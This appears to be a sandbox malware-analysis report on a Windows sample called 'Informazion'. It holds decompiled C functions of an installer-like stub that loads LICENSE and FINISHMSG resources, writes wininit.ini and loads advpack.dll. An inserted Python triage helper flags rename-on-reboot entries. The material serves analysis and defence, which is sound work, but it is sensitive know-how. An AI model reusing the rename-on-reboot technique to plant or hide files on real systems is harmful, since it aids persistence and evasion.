                                                    0x7ff64c512abe
                                                    0x7ff64c512ac2
                                                    0x7ff64c512ac8
                                                    0x7ff64c512ace
                                                    0x7ff64c512adc
                                                    0x7ff64c512ae0
                                                    0x7ff64c512ae5
                                                    0x7ff64c512aeb
                                                    0x7ff64c512af4
                                                    0x7ff64c512b15
                                                    0x7ff64c512b20
                                                    0x7ff64c512b2d
                                                    0x7ff64c512b34
                                                    0x7ff64c512b43
                                                    0x7ff64c512b52
                                                    0x7ff64c512b57
                                                    0x7ff64c512b59
                                                    0x7ff64c512b5f
                                                    0x7ff64c512b6d
                                                    0x7ff64c512b7c
                                                    0x7ff64c512b88
                                                    0x7ff64c512b97
                                                    0x7ff64c512b99
                                                    0x7ff64c512bad
                                                    0x7ff64c512bb2
                                                    0x7ff64c512bc0
                                                    0x7ff64c512bcf
                                                    0x7ff64c512bdb
                                                    0x7ff64c512be3
                                                    0x7ff64c512bea
                                                    0x7ff64c512bef
                                                    0x7ff64c512bf4
                                                    0x7ff64c512bf9
                                                    0x7ff64c512c0b
                                                    0x7ff64c512c1e
                                                    0x7ff64c512c24
                                                    0x7ff64c512c4a

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                    • String ID:
                                                    • API String ID: 975904313-0
                                                    • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                    • Instruction ID: 5307320b65182e4113ec8ec9fdb3ac4d6e85428516f771076ffc2ab11dee555d
                                                    • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                    • Instruction Fuzzy Hash: 4551A561E0C6C645FB257F29A8083BDBF91EB4AB94F488172CAAE47785CF3CD5658700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Window$CapsDeviceRect$Release
                                                    • String ID:
                                                    • API String ID: 2212493051-0
                                                    • Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                    • Instruction ID: a3c9b4ba396c774ecee73c38bf2048e8d292e115cdbde86e4860358ee21fac63
                                                    • Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                    • Instruction Fuzzy Hash: 23318136F289418AE714AF69E8085BD7FB0F749B99F595131CE1A93B48CF3DE4458B00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 48%
                                                    			E00007FF67FF64C513F74(long long __rax) {
                                                    				signed long long _v16;
                                                    				signed long long _v24;
                                                    				void* __rbx;
                                                    				void* _t13;
                                                    				signed int _t14;
                                                    				signed int _t18;
                                                    				long long _t40;
                                                    				void* _t41;
                                                    				void* _t49;
                                                    				void* _t52;
                                                    				void* _t53;
                                                    				void* _t54;
                                                    				void* _t55;
                                                    				void* _t57;
                                                    
                                                    				_t40 = __rax;
                                                    				r8d = 0;
                                                    				_t13 = E00007FF67FF64C515050(__rax, _t41, "LICENSE", _t49, _t52, _t53);
                                                    				_t14 = LocalAlloc(??, ??);
                                                    				 *0x4c51d030 = __rax;
                                                    				if (__rax != 0) goto 0x4c513fdd;
                                                    				_v16 = _v16 & _t14;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = 0x10;
                                                    				E00007FF67FF64C514DCC("LICENSE", _t54, _t55, _t57);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				goto 0x4c5140b7;
                                                    				r8d = _t13;
                                                    				_t18 = E00007FF67FF64C515050(_t40, _t41, "LICENSE", _t40, _t52, _t53);
                                                    				if (_t18 != 0) goto 0x4c514030;
                                                    				_v16 = _v16 & _t18;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = 0x10;
                                                    				E00007FF67FF64C514DCC("LICENSE", _t54, _t55, _t57);
                                                    				LocalFree(??);
                                                    				 *0x4c51d544 = 0x80070714;
                                                    				goto 0x4c513fd6;
                                                    				if (lstrcmpA(??, ??) == 0) goto 0x4c514098;
                                                    				_v16 = _v16 & 0x00000000;
                                                    				_v24 = _v24 & 0x00000000;
                                                    				r8d = 0;
                                                    				E00007FF67FF64C517AC8(_t40, _t41, _t52, _t53, _t54, 0x7ff64c5133f0);
                                                    				LocalFree(??);
                                                    				if (_t40 != 0) goto 0x4c5140ab;
                                                    				 *0x4c51d544 = 0x800704c7;
                                                    				goto 0x4c513fd6;
                                                    				LocalFree(??);
                                                    				 *0x4c51d544 =  *0x4c51d544 & 0x00000000;
                                                    				return 1;
                                                    			}

                                                    0x7ff64c513f74
                                                    0x7ff64c513f7a
                                                    0x7ff64c513f86
                                                    0x7ff64c513f95
                                                    0x7ff64c513fa1
                                                    0x7ff64c513fab
                                                    0x7ff64c513fad
                                                    0x7ff64c513fb1
                                                    0x7ff64c513fb4
                                                    0x7ff64c513fb7
                                                    0x7ff64c513fc6
                                                    0x7ff64c513fd0
                                                    0x7ff64c513fd8
                                                    0x7ff64c513fdd
                                                    0x7ff64c513fea
                                                    0x7ff64c513ff1
                                                    0x7ff64c513ff3
                                                    0x7ff64c513ff7
                                                    0x7ff64c513ffa
                                                    0x7ff64c513ffd
                                                    0x7ff64c51400c
                                                    0x7ff64c514018
                                                    0x7ff64c514024
                                                    0x7ff64c51402e
                                                    0x7ff64c51404c
                                                    0x7ff64c51404e
                                                    0x7ff64c51405b
                                                    0x7ff64c514061
                                                    0x7ff64c514069
                                                    0x7ff64c514078
                                                    0x7ff64c514087
                                                    0x7ff64c514089
                                                    0x7ff64c514093
                                                    0x7ff64c51409f
                                                    0x7ff64c5140ab
                                                    0x7ff64c5140bc

                                                    APIs
                                                      • Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
                                                      • Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
                                                      • Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
                                                      • Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
                                                      • Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
                                                      • Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
                                                      • Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD
                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF64C513139), ref: 00007FF64C513F95
                                                    • LocalFree.KERNEL32 ref: 00007FF64C514018
                                                      • Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
                                                      • Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0
                                                      • Part of subcall function 00007FF64C517700: GetLastError.KERNEL32 ref: 00007FF64C517704
                                                    • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF64C513139), ref: 00007FF64C51403E
                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF64C513139), ref: 00007FF64C51409F
                                                      • Part of subcall function 00007FF64C517AC8: FindResourceA.KERNEL32 ref: 00007FF64C517AF2
                                                      • Part of subcall function 00007FF64C517AC8: LoadResource.KERNEL32 ref: 00007FF64C517B09
                                                      • Part of subcall function 00007FF64C517AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF64C517B3F
                                                      • Part of subcall function 00007FF64C517AC8: FreeResource.KERNEL32 ref: 00007FF64C517B51
                                                    • LocalFree.KERNEL32 ref: 00007FF64C514078
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                    • String ID: <None>$LICENSE
                                                    • API String ID: 2414642746-383193767
                                                    • Opcode ID: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                                    • Instruction ID: bdc57b25df5fcca419ecebe28dea5d9fa0d0d79e36c0a803df715ae15eb16c5b
                                                    • Opcode Fuzzy Hash: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                                    • Instruction Fuzzy Hash: 92315A36E2D6028AF719BF28E41877D7EA0FB84744F445536D92D86794EF7DA0248600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                    • String ID: UPDFILE%lu
                                                    • API String ID: 2922116661-2329316264
                                                    • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                    • Instruction ID: 304c21f5adfabf4e56fb8106025b70fae61585114190bdbe4df5015a3d0e3cf1
                                                    • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                    • Instruction Fuzzy Hash: ED312331E0CA4186E718BF29A40417DBFA1FB89B90F558636DA6E87794DF3CE455C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                    • String ID:
                                                    • API String ID: 3370778649-0
                                                    • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                    • Instruction ID: 3254f9a761043db7fc58f980f9529cc91c0467c57ea3efd58ebf633ccdd1d39a
                                                    • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                    • Instruction Fuzzy Hash: B6111721B0CB8187EB187F66A84807DBEA1EB4EFD1B899139DE5E83758DF3CD4518600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 25%
                                                    			E00007FF67FF64C512244(long long __rbx, long long _a8) {
                                                    				signed int _v24;
                                                    				char _v296;
                                                    				long _t15;
                                                    				signed long long _t34;
                                                    				long long _t36;
                                                    				void* _t43;
                                                    				void* _t44;
                                                    				void* _t45;
                                                    
                                                    				_t36 = __rbx;
                                                    				_a8 = __rbx;
                                                    				_t34 =  *0x4c51c008; // 0xdeba5460e397 - stack-protector (/GS) cookie: XORed with rsp here and re-checked by the tail call before return
                                                    				_v24 = _t34 ^ _t45 - 0x00000140;
                                                    				if (GetWindowsDirectoryA(??, ??) == 0) goto 0x4c5122eb;
                                                    				E00007FF67FF64C517BA8(0x104, _t34 ^ _t45 - 0x00000140, __rbx,  &_v296, _t43, _t44, "wininit.ini");
                                                    				r8d = 0;
                                                    				WritePrivateProfileStringA(??, ??, ??, ??);
                                                    				if (_lopen(??, ??) == 0xffffffff) goto 0x4c5122eb;
                                                    				_t8 = _t36 + 2; // 0x2
                                                    				r8d = _t8;
                                                    				_t15 = _llseek(??, ??, ??); // iOrigin 2 = FILE_END: seeking to the end yields the file size of the just-written wininit.ini
                                                    				_lclose(??);
                                                    				return E00007FF67FF64C518470(_t15, _t14, _v24 ^ _t45 - 0x00000140);
                                                    			}

                                                    Addresses: 0x7ff64c512244 0x7ff64c512251 0x7ff64c51225b 0x7ff64c51227f 0x7ff64c51228f 0x7ff64c512299 0x7ff64c5122a0 0x7ff64c5122c5
                                                    0x7ff64c5122c9 0x7ff64c5122cf 0x7ff64c5122df 0x7ff64c51230d

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                    • String ID: wininit.ini
                                                    • API String ID: 3273605193-4206010578
                                                    • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                    • Instruction ID: 2e44b59144dfa2986543f40eb831a1f7233ab007946d692f6a7b106ddbe6d778
                                                    • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                    • Instruction Fuzzy Hash: 9C112132A08A4187D714BF29E8582BD7BA1FBCD714F858132DA6D83758DF3CD559C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
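The function E00007FF67FF64C512244 above resolves the Windows directory, appends "wininit.ini", writes an entry with WritePrivateProfileStringA, then reopens the file and seeks to its end. wininit.ini is the legacy (Windows 9x-era) rename-on-reboot file: its `[rename]` section lists `destination=source` pairs that are carried out at the next boot, and a destination of `NUL` deletes the source. Self-extracting stubs use it to remove their temporary extraction directory. The helper below is an added triage example, not code from the sample, from the decompiler or from Joe Sandbox: it parses a wininit.ini recovered from the analysis VM and reports the scheduled operations. The INI content and the paths in it are constructed for the example; configparser is deliberately not used because it collapses the repeated `NUL=` keys that are normal in this file.

```python
"""Triage helper for wininit.ini rename-on-reboot entries (added example).

wininit.ini format (Windows 9x era, still written by legacy installer stubs):

    [rename]
    destination=source        ; move source to destination at next boot
    NUL=source                ; delete source at next boot

Keys repeat (several NUL= lines are normal), so configparser, which
collapses duplicate keys, is not used.
"""
from dataclasses import dataclass
from typing import List

# Constructed sample in the format above (not recovered from the analysed sample).
SAMPLE_WININIT_INI = r"""
; wininit.ini written by a self-extracting installer (constructed content)
[rename]
NUL=C:\WINDOWS\TEMP\IXP000.TMP\extracted.exe
NUL=C:\WINDOWS\TEMP\IXP000.TMP
C:\WINDOWS\SYSTEM32\updater.dll=C:\WINDOWS\TEMP\IXP000.TMP\updater.dll

[other]
unrelated=value
"""


@dataclass(frozen=True)
class RenameOp:
    destination: str  # 'NUL' means the source is deleted at boot
    source: str

    @property
    def is_delete(self) -> bool:
        return self.destination.upper() == "NUL"


def parse_rename_section(text: str) -> List[RenameOp]:
    """Return every entry of the [rename] section, in file order, duplicates kept."""
    ops: List[RenameOp] = []
    in_rename = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or INI comment
        if line.startswith("[") and line.endswith("]"):
            in_rename = line[1:-1].strip().lower() == "rename"
            continue
        if not in_rename or "=" not in line:
            continue
        dest, _, src = line.partition("=")
        ops.append(RenameOp(dest.strip(), src.strip()))
    return ops


# Directory fragments (lower-cased, backslash-delimited) that mark staging locations.
SUSPICIOUS_DIRS = ("\\temp\\", "\\appdata\\local\\temp\\", "\\users\\public\\")


def flag_ops(ops: List[RenameOp]) -> List[str]:
    """Human-readable findings: deletion of staging artefacts and moves out of a
    staging directory are the cases worth a look during malware triage."""
    findings: List[str] = []
    for op in ops:
        src_l = op.source.lower()
        from_staging = any(d in src_l for d in SUSPICIOUS_DIRS)
        if op.is_delete and from_staging:
            findings.append(f"delete-at-reboot of staging artefact: {op.source}")
        elif not op.is_delete and from_staging:
            findings.append(f"move from staging into {op.destination}: {op.source}")
    return findings


if __name__ == "__main__":
    for finding in flag_ops(parse_rename_section(SAMPLE_WININIT_INI)):
        print(finding)
```

Run it against `%WINDIR%\wininit.ini` copied out of the sandbox before the VM is rebooted; after a reboot the file has been consumed and the entries are gone, which is exactly why the write deserves attention in a dynamic-analysis timeline.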

                                                    C-Code - Quality: 25%
                                                    			E00007FF67FF64C513840(void* __edx, void* __eflags, void* __rax, void* __rcx, void* __r8) {
                                                    				void* __rbx;
                                                    				void* _t31;
                                                    
                                                    				if (__eflags == 0) goto 0x4c5138e7;
                                                    				if (__eflags == 0) goto 0x4c51388e;
                                                    				if (__edx - 0xffffffffffffff10 == 1) goto 0x4c513866;
                                                    				goto 0x4c5138fd;
                                                    				if (__r8 - 6 < 0) goto 0x4c5138f8;
                                                    				if (__r8 - 7 <= 0) goto 0x4c513889;
                                                    				if (__r8 != 0x839) goto 0x4c5138f8;
                                                    				 *0x4c51d600 = 1;
                                                    				goto 0x4c5138ec;
                                                    				GetDesktopWindow();
                                                    				E00007FF67FF64C514C68(__r8 - 0x839, __rcx, __rcx, __rax, __r8, _t31);
                                                    				SetWindowTextA(??, ??);
                                                    				SetDlgItemTextA(??, ??, ??);
                                                    				SetForegroundWindow(??);
                                                    				goto 0x4c5138f8;
                                                    				EndDialog(??, ??);
                                                    				return 1;
                                                    			}

                                                    Addresses: 0x7ff64c51384c 0x7ff64c513858 0x7ff64c51385d 0x7ff64c513861 0x7ff64c51386a 0x7ff64c513874 0x7ff64c51387d 0x7ff64c51387f
                                                    0x7ff64c51388c 0x7ff64c51388e 0x7ff64c5138a0 0x7ff64c5138af 0x7ff64c5138ca 0x7ff64c5138d9 0x7ff64c5138e5 0x7ff64c5138ec
                                                    0x7ff64c513902

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Window$Text$DesktopDialogForegroundItem
                                                    • String ID: Maintal
                                                    • API String ID: 761066910-1608070445
                                                    • Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                    • Instruction ID: 6e6cc51a147f62588627238353ebafb0c661022a20cf9f975c0811f9ab5d47f7
                                                    • Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                    • Instruction Fuzzy Hash: 071130A0E0D64296F75C3F5DA41C2BC6E51EF8AB41F859132C86E96395DF3CE4A4C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 55%
                                                    			E00007FF67FF64C51494C(void* __rax, long long __rbx, void* __rdx, long long _a8) {
                                                    				signed int _v16;
                                                    				intOrPtr _v24;
                                                    				void* _t13;
                                                    				signed int _t14;
                                                    				signed int _t16;
                                                    				void* _t35;
                                                    				void* _t45;
                                                    				void* _t46;
                                                    				void* _t50;
                                                    				void* _t52;
                                                    				void* _t53;
                                                    
                                                    				_t33 = __rax;
                                                    				_a8 = __rbx;
                                                    				r8d = 0;
                                                    				_t13 = E00007FF67FF64C515050(__rax, __rbx, "FINISHMSG", __rdx, _t45, _t46);
                                                    				_t14 = LocalAlloc(??, ??);
                                                    				_t35 = __rax;
                                                    				if (__rax != 0) goto 0x4c5149a9;
                                                    				_v16 = _v16 & _t14;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = 0x10;
                                                    				E00007FF67FF64C514DCC("FINISHMSG", _t50, _t52, _t53);
                                                    				goto 0x4c514a1d;
                                                    				r8d = _t13;
                                                    				_t16 = E00007FF67FF64C515050(_t33, _t35, "FINISHMSG", _t35, _t45, _t46);
                                                    				if (_t16 != 0) goto 0x4c5149d5;
                                                    				_v16 = _v16 & _t16;
                                                    				r8d = 0;
                                                    				_v24 = 0x10;
                                                    				goto 0x4c514a04;
                                                    				if (lstrcmpA(??, ??) == 0) goto 0x4c514a0e;
                                                    				_v16 = _v16 & 0x00000000;
                                                    				_v24 = 0x40;
                                                    				r9d = 0;
                                                    				E00007FF67FF64C514DCC(_t35, _t35, _t52, _t53);
                                                    				return LocalFree(??);
                                                    			}

                                                    Addresses: 0x7ff64c51494c 0x7ff64c514956 0x7ff64c514962 0x7ff64c514975 0x7ff64c514981 0x7ff64c514987 0x7ff64c514989 0x7ff64c51498d
                                                    0x7ff64c514990 0x7ff64c514993 0x7ff64c5149a2 0x7ff64c5149a7 0x7ff64c5149a9 0x7ff64c5149b6 0x7ff64c5149bd 0x7ff64c5149bf
                                                    0x7ff64c5149c8 0x7ff64c5149cb 0x7ff64c5149d3 0x7ff64c5149ed 0x7ff64c5149ef 0x7ff64c5149f7 0x7ff64c514a04 0x7ff64c514a09
                                                    0x7ff64c514a27

                                                    APIs
                                                      • Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
                                                      • Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
                                                      • Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
                                                      • Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
                                                      • Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
                                                      • Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
                                                      • Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD
                                                    • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF64C513388), ref: 00007FF64C514975
                                                    • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF64C513388), ref: 00007FF64C514A11
                                                      • Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
                                                      • Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                    • String ID: <None>$@$FINISHMSG
                                                    • API String ID: 3507850446-4126004490
                                                    • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                    • Instruction ID: 8875d633bdb74789fc13d93b189a3e418c6e8dbfbea91ac3dea3351c54bfc499
                                                    • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                    • Instruction Fuzzy Hash: 5411A476E1C24287F728BF28E41877E7E91EB85794F44A136DA6E82785DF3CD0148B04
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 44%
                                                    			E00007FF67FF64C5179F0(void* __rdx, void* __r8) {
                                                    				signed int _v24;
                                                    				char _v296;
                                                    				char _t14;
                                                    				signed char _t16;
                                                    				void* _t20;
                                                    				char _t24;
                                                    				signed long long _t29;
                                                    				void* _t35;
                                                    				char* _t36;
                                                    				void* _t37;
                                                    				void* _t44;
                                                    				void* _t45;
                                                    				void* _t46;
                                                    				signed long long _t47;
                                                    
                                                    				_t48 = __r8;
                                                    				_t44 = __rdx;
                                                    				_t29 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_v24 = _t29 ^ _t47;
                                                    				r8d = 0x104;
                                                    				_t36 =  &_v296;
                                                    				_t4 = _t48 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t4 == 0) goto 0x4c517a44;
                                                    				_t14 =  *((intOrPtr*)(0x4c51d610 -  &_v296 + _t36));
                                                    				_t24 = _t14;
                                                    				if (_t24 == 0) goto 0x4c517a44;
                                                    				 *_t36 = _t14;
                                                    				_t37 = _t36 + 1;
                                                    				if (_t24 != 0) goto 0x4c517a25;
                                                    				_t34 =  !=  ? _t37 : _t37 - 1;
                                                    				 *((char*)( !=  ? _t37 : _t37 - 1)) = 0;
                                                    				E00007FF67FF64C517BA8(0x104,  !=  ? _t37 : _t37 - 1, _t35,  &_v296, _t45, _t46, "advpack.dll");
                                                    				_t16 = GetFileAttributesA(??);
                                                    				if (_t16 == 0xffffffff) goto 0x4c517a96;
                                                    				if ((_t16 & 0x00000010) != 0) goto 0x4c517a96;
                                                    				_t12 = _t44 + 8; // 0x8
                                                    				r8d = _t12;
                                                    				LoadLibraryExA(??, ??, ??);
                                                    				goto 0x4c517aa9;
                                                    				return E00007FF67FF64C518470(LoadLibraryA(??), _t20, _v24 ^ _t47);
                                                    			}

                                                    APIs
                                                    Strings
